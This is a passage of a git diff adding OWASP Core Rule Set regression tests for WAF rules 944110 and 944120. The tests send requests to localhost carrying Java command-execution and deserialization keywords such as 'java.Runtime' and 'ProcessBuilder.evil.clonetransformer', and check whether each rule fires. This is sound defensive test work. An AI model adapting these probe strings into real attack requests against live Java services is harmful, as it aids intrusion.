and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-14 + desc: XML element value includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.Runtime" + output: + log_contains: "id \"944110\"" + - test_title: 944110-15 + desc: XML element includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-16 + desc: XML attribute name includes keyworda java. 
and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-17 + desc: XML attribute value includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-18 + desc: XML element value includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.ProcessBuilder" + output: + log_contains: "id \"944110\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml new file mode 100644 index 00000000..831da6f1 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml 
@@ -0,0 +1,2809 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944120.yaml" + description: "Positive tests for rule 944120" +tests: + - test_title: 944120-1 + desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-2 + desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-3 + desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 
944120-4 + desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.clonetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-5 + desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-6 + desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-7 + desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-8 + desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-9 + desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-10 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-11 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-12 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-13 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-14 + desc: "Content-Type 
multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-15 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-16 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-17 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-18 + desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id 
\"944120\"" + - test_title: 944120-19 + desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-20 + desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-21 + desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.forclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-22 + desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 
+ headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-23 + desc: "XML element includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-24 + desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-25 + desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-26 + desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-27 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-28 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-29 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" + stages: + - 
stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-30 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-31 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-32 + desc: "Content-Type multipart/form-data 
json arg value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-33 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-34 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-35 + desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-36 + desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-37 + desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-38 + desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-39 + desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-40 + desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-41 + desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-42 + desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-43 + desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-44 + desc: 